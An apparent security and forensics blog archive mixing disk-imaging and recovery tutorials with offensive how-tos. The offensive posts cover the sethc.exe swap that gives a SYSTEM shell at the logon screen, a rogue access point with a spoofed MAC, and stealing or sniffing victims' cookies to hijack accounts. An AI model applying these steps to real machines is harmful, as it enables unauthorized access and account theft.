# istat disk.img 5 // Displays the details of the meta-data for inode 5. Details include file size, name, Written, accessed and created time, starting sector and sectors that the inode entry (5) occupies

# ifind -n "test.jpg" disk.img // searches for test.jpg then if found, returns the respective inode number

# ifind -d 536 disk.img // finds the relative inode number given the respective sector num (536 in this case)

# dls disk.img // By default dls copies the data from unallocated blocks only. Add the '-e' option and dls would copy every block, with the output being similar to the dd program

# dcat disk.img 12 //will display the contenst of sector #12

# sigfind 424d disk.img //searches for the magic bytes '424d'(typical for BMP files) throughout the disk image disk.img and return the sector offsets of the hits.

# sigfind -l 4d42 disk.img // This command will parse throught the entire disk image looking for the magic bytes of "424d" and return the sector offset of the result. The '-l' options means takes the magic bytes to search for in little indian format and must therefore be reversed, hence in our example, -l 4d42.

One common task of a forensic examiner is to perform keyword searches throughout a disk image. You can use the strings command to create an index of all the string characters found withing the image.

# strings -t d disk.img > index.lst // The '-t d' option displays the offset in decimal in which strings can be located or referenced to. You can then use the grep program to parse the strings.lst file for text.

# grep -f kewords.txt index.lst //keywords.txt can be a simple file with keywords like "pass", "password", "confidential", "Credit card", "username", "login", etc. with each word being on a line by itself.

To get information regarding file activity you can issue the following command

# fls -m "/" disk.img | mactime -b // The output of this command will create an ASCII time line of file activity

The above can also be accomplished with:
# ils -m -e disk.img | mactime -b

Resources/Good Reading:
www.sleuthkit.org

Data recovery with Fatback and photorec

2010-05-12T05:18:00.000-07:00

Fatback is a simple utility used mainly to aid in filerecover from fat16/32 drive types. It is able to give you relevant information including a list of all the files on a drive, including deleted files (Deleted files found within the root directory structure), the starting cluster number of each file, the cluster chain of each file (not applicable to deleted files) and the individual file sizes. It gives you the option to recover files from the clusters that the file occupies (deleted files will not show cluster chains)which makes the tool only relevant for recovery of files from drives that fail to mount or contain multiple bad sectors. Therefore this will not be the tool of choice to recover deleted files, although it does give you enough information to make it possible to manually recover them.

Its usage is very simple:

fatback [block_device]
# fatback /dev/sdb

You will be presented with fatback's sub prompt. You can type 'Help' to see the list of commands avaiable to you. The commands are quite easy to understand and intuitive to use so i will not rant on this tool any longer.

Photorec will be a better tool that you may want to use when attempting to recover deleted files. This tool can recover all kinds of files and doesn't really care about the filesystem. PhotoRec is also companion program to TestDisk, an app for recovering lost partitions on a wide variety of file systems and making non-bootable disks bootable again. It is very important to note that you should not write recovered files back onto the drive that you are recovering files from. By doing this, you can potentialy overwrite important data on that disk. Likewise, As soon as a pic or file is accidentally deleted, or you discover any missing, do NOT save any more pics or files to that memory device or hard disk drive; otherwise you may overwrite your lost data.

Usage:

photorec [Block_device]
# photorec /dev/sdb

This would put you through photorec's interface. The interface is very easy to understand and follow. From here you can select the device you would like to recover files from (if you didn' pass the option as a parameter when calling the program), destination to store the recovered files, files types to restore, etc. You can visually get an idea of photorec's interface and more write up on using the tool from http://www.linux.com/news/enterprise/storage/8257-how-to-recover-lost-files-after-you-accidentally-wipe-your-hard-drive : article written by Shawn Hermans

Resources/Good Reading:

http://www.linux.com/news/enterprise/storage/8257-how-to-recover-lost-files-after-you-accidentally-wipe-your-hard-drive
http://www.cgsecurity.org/wiki/PhotoRec
http://sourceforge.net/projects/fatback/

Up and running with Adito (Openvpn ALS) VPN solution

2010-04-14T11:30:00.000-07:00

Just recently i've had the opportunity to install the VPN server software, Adito, now known as Openvp-ALS and i find this piece of software to be very impressive. Adito is what is known as a clientless system, which means that no additional client software needs to be installed to connect to the server (you use any web browser as the client). It is based of SSL-Explorer, a once open source project that utilizes SSL technology to establishits VPN tunnels. Adito works similarly with SSL being the very gut of it's VPN system. The project also utilizes java, making it quite universal in the sense that it can be installed on Windows, Linux or a MAC. Because it works over HTTPS you can access your files securely from almost anywhere.

Installing on a linux system:
(System used: Bactrack 4)

NOTE: The following steps were taking from http://jaredheinrichs.com/how-to-install-adito-on-ubuntu-linux.html

# sudo apt-get install default-jre icedtea6-plugin openjdk-6-jdk // if this doesn't work, you may optionally try to install sun-java6-bin sun-java6-jdk sun-java6-plugin sun-java6-jre packages
# sudo apt-get install ant
# sudo wget http://superb-east.dl.sourceforge.net/sourceforge/adito/adito-0.9.1-bin.tar.gz // this link might be broken so you may need to find the updated path for the download
# sudo mv adito-0.9.1-bin.tar.gz /opt/
# cd /opt
# sudo tar -zxvf adito-0.9.1-bin.tar.gz
# cd adito-0.9.1
# sudo ant install

This should start up the webserver on port 28080 on localhost.

Open Browser on your local machine and go to: http://127.0.0.1:28080

Create New Certificate

Step 1 – Set Keystore Passphrase – Type password twice for Cert
Step 2 – Create New Certificate – Fill out Form
Step 3 – Configure User Database – Built-in
Step 4 – Configure Super User – Fill out Form
Step 5 – Configure Web Server – Leave defaults
Step 6 – Configure Proxies – Leave blank unless you use proxy – Hit Next
Step 7 – Summary

Install Complete
install
Go Back to the Ubuntu CLI (Command line interface)
# sudo ant install-service //This sets up the system so you can manage it from /etc/init.d with the usual start|stop|restart commands
# sudo ant start

For installing on windows, please see: http://lars.werner.no/?page_id=153

NOTE: When using backtrack 4 to connect to the VPN server, i ran into issues with the java run-time not being initialized in Firefox. This may be the case with other Linux Distro's as well.To get this working I needed to create a symbolic link to the java run-time plug-in file to my hidden "/root/.Mozilla/plug-ins" directory (in other cases it would be in the user's home directory). The plug-ins directory might not be there as Mozilla probably doesn't have any plug-ins installed as of yet so i went ahead and created that directory.

# cd /home/user_dir/.mozilla
# mkdir plugins
# ln -s /usr/lib/jvm/java-6-sun-1.6.0.10/jre/plugin/i386/ns7/libjavaplugin_oji.so

or if the above doesn't work

cd /usr/lib/firefox-dir/plugins
# ln -s /usr/lib/jvm/java-6-sun-1.6.0.10/jre/plugin/i386/ns7/libjavaplugin_oji.so

Restart Firefox and all should be well

Resources / Good Reading:
http://jaredheinrichs.com/how-to-install-adito-on-ubuntu-linux.html
http://sourceforge.net/projects/openvpn-als/
http://www.sohoadvisers.com/tutorials/adito-ssl-vpn/installing-adito-ssl-vpn
http://lars.werner.no/?page_id=153

Image partitions with the linux tool Partimage

2010-04-12T12:33:00.000-07:00

Just recently i was looking at some alternative partition cloning software to the one i frequently use, driveimagexml. Not that their was anything wrong with DriveImageXML, i just was looking for a linux alterative. Little did i know, built into backtrack 4 was a piece of software called partimage which would accomplish pretty much what i would want. As in my recent posts on dd, one disadvantage to dd is that it backs up an entire partition, not just the used space. So if you have a 10 gig partition and only 2 gigs is used up, dd would produce a 10 gig exact copy of the partition. Partimage however only backs up the used portion of the partition saving you time and space.

To launch/use partimage:
# partimage

This launches an n-curses based user interface which is far from complicated and the options doesn't really need much explanation

For more info on its usage, see www.psychocats.net/ubuntu/partimage or www.partimage.org

Hexedit a hard disk

2010-04-11T19:31:00.000-07:00

I'm gonna be simply changing a flag within the boot sector that identifies the system (or boot) partition. This will serve as the basic principles behind doing low level hard disk analysis and editing, typically common withing digital forensics.

The boot sector is the first 512 bytes on a hard disk (446 bytes for bootloader code, 64 bytes for partition table, and the last two bytes in the sector are a signature word for the sector and are always hex 55 AA). The partition table contains the entries for the primary and extended partitions and each entry is 16 bytes long, giving a maximum of 4 entries available.

The following table describes each entry in the Partition Table. The sample values correspond to the information for partition 1.(taken from http://www.ntfs.com/partition-table.htm)

Partition Table Fields

Byte Offset	Field Length	Sample Value	Meaning
00	BYTE	0x80	Boot Indicator. Indicates whether the partition is the system partition. Legal values are: 00 = Do not use for booting. 80 = System partition.
01	BYTE	0x01	Starting Head.
02	6 bits	0x01	Starting Sector. Only bits 0-5 are used. Bits 6-7 are the upper two bits for the Starting Cylinder field.
03	10 bits	0x00	Starting Cylinder. This field contains the lower 8 bits of the cylinder value. Starting cylinder is thus a 10-bit number, with a maximum value of 1023.
04	BYTE	0x06	System ID. This byte defines the volume type. In Windows NT, it also indicates that a partition is part of a volume that requires the use of the HKEY_LOCAL_MACHINE\SYSTEM\DISK Registry subkey.
05	BYTE	0x0F	Ending Head.
06	6 bits	0x3F	Ending Sector. Only bits 0-5 are used. Bits 6-7 are the upper two bits for the Ending Cylinder field.
07	10 bits	0x196	Ending Cylinder. This field contains the lower 8 bits of the cylinder value. Ending cylinder is thus a 10-bit number, with a maximum value of 1023.
08	DWORD	3F 00 00 00	Relative Sector.
12	DWORD	51 42 06 00	Total Sectors.

First we identify the partition table.
# xxd -l 64 -s +446 /dev/sdb // jumps to the offset at byte position 446 and displays the next 64 bytes which will be the partition table

Now according to the partition table field the first byte( of the 16 byte per entry) represents the boot indicator field. When the BIOS passes control to the boot sector, the code withing the fist 446 bytes looks at the partition table and identifies the boot/system partition (Legal values are hex value 80 or 00: 00 = Do not use for booting, 80 = System partition). We are gonna change this system partiton flag to 00. This will see the partition as unbootable.

So the MBR is 446 bytes in length(offset 0-445). The next 64 bytes represents the partition table consisting of a possible 4 entries (16 bytes x 4). The first byte of each entry indicates whether its the system partition or not. If their was only one partiton then the bytes 446 - 462 would contain values, whilst the rest of the entries would be all zero's.

To change the first partition entry system id field, we want to put the value of hexadecimal 00 at offset 446 bytes. First we create a simple text file with only the value of 00 in it. Then we use the 'xxd' program to convert this simple text file into a binay file containing only the hex value of 00.

# echo "00" | xxd -ps -r > byte.bin

Now to get that byte written into offset 446 you use the 'dd' program.
# dd if=byte.bin of=/dev/sdb seek=446 bs=1 count=1// reads and writes 1byte , 1 time, from byte.bin file at offest 446 into the block device /dev/sdb

To do this all in one command, we can make use of pipes:
# echo "00" | xxd -ps -r | dd of=/dev/sdb seek=446 bs=1 count=1

References/Good reading:
http://www.ntfs.com/partition-table.htm
http://www.linuxquestions.org/questions/linux-newbie-8/learn-the-dd-command-362506/

Using 'dd' or 'dcfldd'for disk imaging and backup

2010-04-08T06:42:00.000-07:00

DD is a very ancient unix utility that still has its superiority in the disk imaging and cloning categories of tools. Being command lined based, it reads from standard input and write to its standard output which allows you to use 'pipes' for advanced processing and remote networking capabilities.

DCFLDD is an enhanced version of dd and follows the same structure when passing arguments, i.e, keyword=value format. The commands are almost identical so you can pretty much use the same commands that you use in dd with dcfldd but not necessarily the other way around as the later has some enhancements that dd does not have. Some of dcfldd enhancements include

Hashing on-the-fly - dcfldd can hash the input data as it is being transferred, helping to ensure data integrity.
Status output - dcfldd can update the user of its progress in terms of the amount of data transferred and how much longer operation will take.
Flexible disk wipes - dcfldd can be used to wipe disks quickly and with a known pattern if desired.
Image/wipe Verify - dcfldd can verify that a target drive is a bit-for-bit match of the specified input file or pattern.
Multiple outputs - dcfldd can output to multiple files or disks at the same time.
Split output - dcfldd can split output to multiple files with more configurability than the split command.
Piped output and logs - dcfldd can send all its log data and output to commands as well as files natively.

Using dd you can create backups of an entire harddisks or just parts of it.
Hard disk copy/Back up::
# dd if=/dev/sda of=/dev/sdb
# dd if=/dev/sda of=/path/to/image
# dd if=/dev/sda | gzip > /path/to/image.gz //makes image of sda disk and pipes it to the gzip program for compression of the backup image file image.gz

Restore Backup
# dd if=/path/to/image of=/dev/sda
# gzip -dc /path/to/image.gz | dd of=/dev/sda

MBR Backup
# dd if=/dev/sda of=/path/to/mbr/image count=1 bs=512

MBR Restore
# dd if=/path/to/mbr/image of=/dev/sda
add "count=1 bs=446" to exclude the partiton table

More Advance commands
# dcfldd if=/dev/sda of=/path/to/image bs=4096 conv=notrunc,noerror //

make an iso image of CD
# dcfldd if=/dev/cd of=/home/mycd.iso bs=2048 conv=notrunc // CD sectors are 2048 bytes so this copies sector to sector. The result will be a hard disk image file of the CD. You can use "chmod a+rwx mycd.iso" to make the image writable.

make an iso image of Hard disk
# dcfldd if=/dev/hda of=/home/disk.iso bs=4096 conv=notrunc,noerror

To mount the image: # mount -o loop /path/to/image /mnt/mountpoint

In some cases, you would not be able to mount the image file. What you need to do is determine the offset of the sector (not the cyclinder). You can get the cylinder offests using fdisk.

First, associate one of the loop interfaces with the image file # losetup /dev/loop0 /path/to/image

Then
# fdisk -l /dev/loop0

Disk /dev/sdb: 8036 MB, 8036285952 bytes
255 heads, 63 sectors/track, 977 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x00000000

Device Boot      Start         End      Blocks   Id  System
/dev/sdb1   *           1         976     7839698    b  W95 FAT32

What we really want is the offset of the sector so we add the '-u' flag to fdisk
# fdisk -ul /dev/loop0

Disk /dev/sdb: 8036 MB, 8036285952 bytes
255 heads, 63 sectors/track, 977 cylinders, total 15695871 sectors
Units = sectors of 1 * 512 = 512 bytes
Disk identifier: 0x00000000

Device Boot      Start         End      Blocks   Id  System
/dev/sdb1   *          44    15679439     7839698    b  W95 FAT32

We then take the start of the partition that you want to edit 44 in this case and multiply it by 512 ie 512*44=22528

then mount like this: # mount -o loop,offset=22528 /dev/loop0 /mnt/mountpoint

Getting started with openssl

2010-03-25T08:29:00.000-07:00

According to its manpage, it is a cryptography toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security network protocols and related cryptography standards required by them. It is indeed a command line tool and allows you to create RSA and DSA keys, x.509 certificates, calculation of message digests, encryption and decryption of files with optional ciphers, etc. As there are so many ways to use this tool, i will show some of its basic usages that one may find useful.

# openssl -h // for command switches
# man openssl //Documentation of the tool
# openssl list-standard-commands // list standard commands. Doesn't say what they do so you are better off using "man openssl"
# openssl list-cipher-commands //list different symmetric ciphers you can use for encrytpion
# openssl list-message-digest-commands //lists different hashing algorithms you can use for data integrity checking

# echo "password" | openssl md5 //creates the md5 hash for the string password
# echo "password" | openssl enc -md5 //does the same thing as previous example
# openssl bf -in myfile.txt -out myfile.txt.enc //encrypts the file "myfile.txt" using the blowfish cipher 'bf' to a new file 'myfile.txt.enc'. You can now delete the old file

# openssl enc -bf -in myfile.txt -out myfile.txt.enc //encrypts the file "myfile.txt" using the blowfish cipher 'bf' to a new file 'myfile.txt.enc'. Equivallent to the above command.

# openssl enc -bf -d -in myfile.txt.enc -out myfile.txt //decrypts the file "myfile.txt.enc" using the blowfish cipher 'bf' and outputs the decrypted file to a new filename 'myfile.txt'.

Using Public Key Cryptography

# openssl genrsa -out private.key //Generates private key

# openssl rsa -pubout -in private.key -out public.key //generates public key from the private key

# openssl rsautl -encrypt -inkey public.key -pubin -in test.txt -out test.txt.pub //encrypt a file with public key. Note that you are limited to small file sizes

# openssl rsautl -decrypt -inkey private.key -in test.txt.pub -out test.txt //decrypts the file with the private key

Using Metasploit for OS fingerprinting

2010-03-22T06:40:00.000-07:00

Metasploit is primarilly a framework for developing and testing exploits. It comes with a suite of supporting tools that aid in exploit development, including port scanners. We can use one of these scanners to scan for open ports and fingerprint Windows services as well as the OS type. Using the following commands we can quickly fingerprint the SMB port of 445 to determine the OS version.

# ./msfconsole //launches the framework

msf> use auxiliary/scanner/portscan/syn
msf auxiliary(syn)>show options
set the necessary options, using port 445 as the port
msf auxiliary(smb version)>run
[*] TCP OPEN 192.168.1.61:445
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Then based on your results, if port 445 is open on the host, use
msf> use auxiliary/scanner/smb/smb_version
msf auxiliary(smb version)>show options
set the rhosts option then run the auxiliary module:
msf auxiliary(smb version)>run
[*] 192.168.1.61 is runnnin Windows XP Service Pack 3(Language: English) (name:PC1) (domain:PC1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As you can see, withing a few simple metasploit commands you can determine the OS type of a remote system. This however uses the SMB port of 445 and is a requirement for this experiment. Then are other ways to determine this information but this is one of the most reliable methods.

Physical access == priveledge escalation pt 2

2010-03-18T07:04:00.001-07:00

This is another method that i found out recently that allows one to obtain a command prompt at the logon screen with system priveleges. If you recall from one of my previous post, i did this same trick using the utilman.exe replacement method. It turns out that there is another exe that we can replace as well to accomplish this same trick, called "sethc.exe". You replace this with cmd.exe then reboot your computer. When you encounter the logon screen, hit the shift key five times and you should now be greeted with a command prompt with system priveleges.

Quick notes:

Load up any linix OS
Mount the windows drive in a rw state: "mount -t ntfs-3g /dev/sda1 /mnt/sda1"
Navigate to the Windows/System32 folder: "cd /mnt/sda1/Windows/System32"
Rename sethc.exe : "mv sethc.exe sethc.bak"
Copy cmd.exe to the name of sethc.exe: "cp cmd.exe sethc.exe"
Sync the changes and flush buffers, Optional but safe: "Sync"
Reboot Comp: "reboot"
When on the logon screen hit the shift key 5 times and you should be presented with a command prompt with system priviledges. From here on you might wanna create a new user and add him to the administrators group

References/Good Reading:
Pentestit

Turning your laptop into a wireless AP

2010-03-09T07:05:00.000-08:00

I'm just gonna go over some simple code and tools that you can use to transform your laptop running linux into a wireless access point where wireless clients can connect to. The programs that i will be using are airmon-ng, airbase-ng, dhcpd-server and dnsmasq just to name a few. Other utilities will be used in my example here but they are mostly complementary tools that may not be deemed necessary.

First we create a virual interface using airmon-ng
#airmon-ng start wlan0 //this uses the wireless card as a prototype so to speak to create a virutal interface (mon0) that can operate in what is known as monitor mode

We then will put our new virtual interface down so we can change our mac address to something other than the original address.
# ifconfig mon0 down //pull interface down
# macchanger -m 00:00:F0:0D:00:00 mon0 //changes the mac address originally at mon0
# ifconfig mon0 up //brings the interface back up

We then will use the airbase-ng program to create yet another virtual interface that would have the ability to act as an AP. This interface operates in what is known as Master mode, where it has the ability to act as a synchronisation master for clients. I usually would use the xterm command to create a new window to execute the airbase-ng program as its output can be very useful as it will show the current clients attempting to authenticate and associate with your machine.

# xterm -bg red -bd blue -fg white -hold -geometry 96x25+0+0 -e airbase-ng -e "GoodAP" -c 6 -v mon0 & //uses mon0 interface to create a new virutual interface (at0 by default). Xterm allows the output of the airebase-ng command to be displayed in a new x-based window. Airbase-ng '-e' gives the ssid name, '-c' gives the channel number to broadcast on and -v is for more verbose output.

A new virtual interface is now available, at0. This is the interface thats gonna respond to wireless client probe requests. At this stage it needs to be configured and given and ip address.

# ifconfig at0 10.0.0.1 netmask 255.255.255.0 up
# ifconfig at0 mtu 1400

Our access point with the name "GoodAP" should now be broadcasting and clients would be able see it. However we are not complete in setting up our AP. Our clients need to be able to get a IP address via dhcp server and be able to resolve dns requests via a dnsserver. You would need a dhcp.conf config file. You can find many examples on the web of simple configs.

[dhcpd.conf]

authoritative;

option domain-name-servers 10.0.0.1;
default-lease-time 360;
max-lease-time 720;

subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.2 10.0.0.5;
option subnet-mask 255.255.255.0;
option routers 10.0.0.1;
option broadcast-address 10.0.0.255;
option domain-name-servers 10.0.0.1;
}

Issuing the next two commands will take care of some permission issues when running the dhcpd server. Dhcpd server is run under the dhcpd user account, which do not have write permissions for the directory /var/run. To overcome this issue, simple do the following:

touch /var/run/dhcpd.pid

chown dhcpd:dhcpd /var/run/dhcpd.pid

By issuing the above, you are now giving the server permissions to have the relevant access to its PID file that it attempts to create and write to.

Also

# chown dhcpd {dhcpd.conf,dhcpd.leases}
# chgrp dhcpd {dhcpd.conf,dhcpd.leases}
Remember, you may have to do the same for the parent folder as well from which the script or command is being ran

Start the dhcpd service:
# dhcpd3 -cf dhcpd.conf -lf dhcpd.leases -f at0
Note: You may get some errors relating to permissions and writing to the lease file. Simply change the user and group ownership of your leases file. You may also have to change the permissions of the directory as well. I made a directory specifically for my config and lease files and had to change the ownership permissions to the file and directory for everything to work fine.

Since the dhcpd.conf file sets the clients up to use our ip as the DNS server, we can set up a simple DNS server to handle the requests. I used dnsmasq (apt-get install dnsmasq). It works straight off a fresh install with no configuration. It uses the its local/etc/resolv.conf to forward the requests to. So basically, it listens on port 53 and forwards the request to the servers listed in /etc/resolve.conf. It may also cache these lookups as well.

Start the simple dns cacheing server.
# dnsmasq restart

You would need to set your kernel to forward mode to forward all packets not destined for it
# echo 1 > /proc/sys/net/ipv4/ip_forward

The last thing we really need to do here is to set IP masqerading. It allows the synchronization between two networks with different IP address, like a NAT router.

# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

With this setup, airbase-ng will set up the AP interface for you, its your duty to start the necessary dhcp and dns servers to automate client setups. Forwarding withing the kernel is crucial so the clients wont be succeptable to denial of service by the kernel and an all important ip masquerade command for synchronization between the wireless nic and ethernet nic on the laptop.

The above is a basic overview of how this is done and may require an above average understanding of linux and servers. These are the basic commands that should get you up and going, although on your machine, there may be some things that need tweaking. Remember, everymachine is different and what might work for me may not work for you without little modifications on your system. Its very important to know what you are doing and what to expect from these tools as this knowledge would prove to be very valuable when you have to troubleshoot problems.

More on cookies(sidejacking) and browsers

2010-02-25T07:51:00.000-08:00

I spoke about sidejacking in recent posts and the advantage a hacker can gain with a users cookie. Cookies are used to authenticate users to a domain and cookies are stored locally somewhere on your computer. I wrote perl sniffers that can sniff the relevant cookies to pull of a sidejacking attack but its so much easier to just copy them to a thumb drive when you have physical access to the victims machine.

In IE, cookies are stored as simple text files that can be open with notepad or wordpad for easy viewing. The location of the stored cookies from IE is in "c:\documents and settings\user_name\cookies". Each text file represents a stored cookie. You cant just copy them onto your machine and hope to gain access to your victims account. There is an index.dat file that seems to be a very important file thats constantly in use and cant be opened while the operating system is running (this file contains the list of legit cookies that should be loaded in IE). However if you were to obtain those cookies, open them up in an editor and input them into your browser using a cookie editor, then you are just clicks away from pulling off a sidejacking attack.

In firefox, the cookies are not stored as individual text files, but rather in a database file called "cookies.sqlite". This file is located at "c:\documents and settings\user_name\application data\mozilla\firefox\profiles\xxxx.default". As it is a database file you will need a sqlite databse editor in order to read its contents. I use this free sqlite manager called SQLite Database Browser 2.0. For security reasons you wont be able to read this database file on its own. There is a "permissions.sqlite" file that also needs to be copied to the same directory as cookies.sqlite as well. So the cookies.sqlite and permissions.sqlite files are both needed in order to read the contents of the cookies.sqlite folder. Just copy both to the same folder together then you should be able to open them up in the sqlite browser program and read the cookie information.

Now we know where the cookies are stored, what can we do from here?
Well, if you have physical access to a users machine you can sneakily copy those cookie files to your thumb drives and process them when you get home to your attacking machine. Whats even more clever is to create an auto-run script that automates this process. So you would have a malicious usb thumb drive and when you plug it up to a victims machine, it copies the necessary cookies from the victims machine to the thumb drive in a few seconds (say 5 seconds). The attacker can takes those cookies home and munch on them as he grins in amazement as he reads his victims eamils without even logging in with the relevant user name and password.

RAM(memory) analysis

2010-02-23T11:10:00.000-08:00

What is stored in ram? Programs? Yes. Can you think of anything else? Well let me introduce you to a crucial aspect of almost every digital forensics investigation. Digital forensics doesn't stop at hard drive analysis as most indiviuals may assume but in many cases (most) when applicable, the RAM is also investigated. RAM can reveal many things that a hard drive wouldn't. Put simply, a hard may contain pieces of the entire puzzle and the RAM may contain the remaining pieces. Just as an example. If a user sent an email to someone using some outlook and deleted stored copy of from the "sent emails" folder, how would you attempt to recover that? First off, you probly wouldn't even have a clue that it exists. The hard drive would have information about outlook being used but the information ends there. Chances are that you wont be able to recover such info from the hard drive in this case but all is not lost. Back to the original question i started off with, What is stored in RAM? Alot on things to be put in one sentence. You can find programs, passwords, web pages, pictures, documents etc. These represent files and programs that were accessed from the time the system was started and been up and running. This means that you can recover files from RAM. Yes, you can use a method in which you can carve the files out of memory, using similar recovery techniques used in hard drives to recover data.

I'm gonna go through a simple demonstation, from obtaining RAM and tools you can use to analyze or carve files out of memory.

Mdd:
This is a windows based command line tool that can dump the contents of RAM fairly fast.
command: mdd.exe -o ramimage.img

After mdd has dumped the RAM, i then upload it to a typical linux distro for analysis (I use Backtrack 4).

I then can use the "strings" command and pipe the output to the "grep" command to search for keywords like 'password', 'vb_login', 'md5_password', 'confidential', 'secret' etc.

To get an idea of the websites browsed/visited in the time the machine was booted i like to use the following :

#strings diskimage.img | grep "Visited:" |more
#strings diskimage.img | grep "Referer:" |more

A more advanced utility that i find very useful is the Volatility frame work. Its a python based suite of tools used to parse RAM dumps for more specific information. This includes a listing of all currently running processes, a listing of running services and open ports (equivalent to the netstat command), lists the loaded dlls, lists open files and much more. Its more for the advanced user so i wont get into it but its not that very hard to use. Oh, in Windows XP service pack 3 (or 2, cant remeber which), you can get the SAM hashes from the acquired memory image.

xxd can be a usefull utility that gives you an alternative way to view memory.
#xxd diskimage.img|more

To carve files out of RAM i use scalpel or foremost. These programs allow you to carve files by first identifying special bytes that indicate the potential file types for files. The header and footer information may also be needed to carve out the entire file itself.

Autopsy is a more enterprise suite that combines ease of use and a nice interface into the methods that were discussed earlier. It groups investigations into cases and keeps everything you do organized. This tool is used by many professional organizations for investigating cyber crimnals, etc. but shouldn't be used by itself as an entire forensics solution.

Driftnet, - a sniffer for you(noob), but not so much for me

2010-02-23T10:44:00.000-08:00

Although i can never find a situation where this tool becomes a must have for my security toolbox, maybe someone else might. Its a simple sniffer with a specific purpose. It looks for and captures images and can store them to a location you specify. Whats also cool about the tool is that it can display images instantly as they are seen across the wire in a little window panel that updates almost instantaneously. It only picks out jpeg and gif type images which is basically most of the images out on the internet anyways.

Drifnet also has the ability to sniff mpeg audio as well from the network and potentialy play them through a player such as mpg123.

Commands:
#driftnet -h //help, lists other available commands

#driftnet -i eth0 //sniffs images and displays them instantly in a little window as it sees them across the wire. You would have to click on the image to save them in the current folder.

For more information on this tool, google has lots of info for you to discover and the man pages are almost always available to you in linux.

Stealing cookies to impersonate web-users and hijack user accounts (Sidejacking)

2010-02-01T12:41:00.000-08:00

This post is more on theory behind such an attack and why they work. I blogged about a tool called ferret and hamster in the past which can be used to demonstrate this attack. When i first saw the awesomeness of such a tool a line was drawn between me having the understanding of what was really going on and being a script kiddie. I knew how the attack works and why it works but it was never something i could've accomplished on my own. That is no longer the case anymore :)

The idea behind the side jacking attack is to impersonate a user via their cookies and session IDs. Cookies and session IDs are two mechanisms that a webserver may use to authenticate or remember its clients. For example, say you log onto gmail and you exit that web browser session without signing off, the next time you open up your browser and navigate to the gmail sign on page, you would notice that you are automatically signed in. This is because there are certain cookies and session ids stored in your browser that is being used to authenticate you to gmails servers.

This attack isnt quite difficult using tools like ferret and hamster that are already out there but sometimes things don't work like they should. I've encountered such problems and decided to digg deeper into this and see how i can do this attack without using such tools and maybe i can understand why they work sometimes and fail the other times. The difficulty in writing such a program is in figuring out what cookies to clone. In my research i also found that only the content field in the cookie might be used to authenticate the user and not so much the expiration date and time fields. Haven't tested on many sites but i tested on one of my favorite music discussion forums, www.boxden.com.

I wrote a few perl sniffers including one(specifically tailered to sniff the cookies from the boxden.com domain, that extracts the cookie information in an easy to read format. When the sniffer sees the necessary cookies from this domain, including session and userid cookie information, it pulls them out and dumps them to standard output(screen). I can then quickly manually use a firefox extension to edit and or add cookie information as necessary. After insertion of the required cookies, i can then navigate to the domain (in this example, www.boxden.com) and with some good luck, you would now be impersonating someones user account. You now would be able to read their emails, edit some of their personal information etc. Its for this reason users should be more concious, not only when using public internet hotspots, but even at work and their homes as well. This type of attack can best be mitigated by remembering to logout from all your web sessions.

Apt-get cheat Sheet

2010-01-27T06:28:00.000-08:00

Just something that always comes in handy for me and my short term memory. Apt-get is a package manager tool used to install, remove, update and manage packages (software) on debian/ubuntu based linux machines. I stubbled accross this on another blog and i find it to be short and straight to the point. Hope you may find this useful as well.

Taken from http://archangelamael.blogspot.com/2009/06/using-apt-get-quick-reference.html

There are 3 basic installers in BT4 apt-get the basic command line package
management system. aptitude is a curses based front end for apt-get.
And synaptic which is a gui version. Other than that there really are no major
differences.
Now lets look at some of the commands that are available for us.
First
Code:

# man apt-get

The manual page read it.
Code:

# apt-cache pkgnames

Gives us the names of all the installed packages we have on the system.
The list is not really to organized so add a | pipe and sort to the end and then it will alphabetized.
Code:

# apt-cache search programname

add the name of a program that you want to search for. The command will show software packages with the expression you entered. One problem with apt is that it really needs the exact name of a package for better results.
Code:

# apt-get install packagename

Pretty simple since all the work is now done for you.
There is a caveat to this method of package installation. You can't pass any
configuration options to the program. To remove a package just the opposite
should be done.
Code:

# apt-get remove packagname

This will remove the package but may not remove all configuration files. In order for that do instead
Code:

# apt-get remove --purge packagename

Next updating software.
First:
Code:

# apt-get update

This updates the list of currently installed software, this is the same list that we saw earlier. Next actually updating said list.
Code:

# apt-get upgrade

Now the thing about this command is that it will upgrade to the most recent
version of all packages on the system. This may or may not always be the best way of doing business. Some packages may not work as well as the older ones. Use with care. use a -s before upgrade to simulate, or see which software will be updated. A better way is to use dist-upgrade
Code:

# apt-get dist-upgrade

This will upgrade all packages with conflict resolution and discarding less important packages for more important ones. There are many other commands but the above should help get you started working with apt. Hope it helps.
Credits: This tutorial was created with help from the Debian APT How-To which can be found here: Debian -- Debian Documentation Project
And the man page

Resources/Good Reading:
http://archangelamael.blogspot.com
http://archangelamael.blogspot.com/2009/06/using-apt-get-quick-reference.html

Up and running with Nexpose

2010-01-27T05:35:00.000-08:00

Nexpose is a vulnerability scanner made by the team at rapid7 (company that now owns the metasploit project). Its very similar to the popular Nessus, which i haven't blogged about yet but have used in the past (will blog about Nessus soon). Just to point out some of the features quoted from their website at rapid7.com:

Unrivaled breadth of vulnerability scanning - scans for more than 11,000 vulnerabilities with nearly 40,000 vulnerability checks based on pre-defined scan templates in networks, operating systems and databases (up to 32 IPs)..
Regular vulnerability updates - automatically provides vulnerability updates without user intervention. Delivers immediate Microsoft Patch Tuesday vulnerability updates within 24 hours or less to stay current with the changing threat landscape.
Prioritized risk assessment - identifies risk based upon how the vulnerability in one system affects another.
Remediation guidance - helps resolve vulnerabilities quickly and easily with the information provided in remediation reports.
Accurate scan results - delivers accurate scanning results in less time with an expert system that combines traditional scanning methods with assessment processes modeled after human decision making.
Out-of-the box Metasploit integration - works with the Metasploit Framework to provide remote scan control, exploit identification and automated exploitation functionality to NeXpose users.
Extensive community support - provides collaboration and knowledge exchange among security professionals via full access to the Rapid7 Community Portal at http://community.rapid7.com.
Simple deployment- easily deploys as a software solution on laptops and desktops.
No cost start-up security solution - provides a free entry-level vulnerability management solution.

Nexpose can work both on 32 and 64 bit versions of linux and windows. Installation is simple and straight forward as long as you are very precise in following instructions :). I used archangelamael.blogspot.com tutorial to get things up and running.

[Installation:]
http://archangelamael.blogspot.com/2009/12/installing-nexpose-in-back-track-4.html

[Using NeXpose]
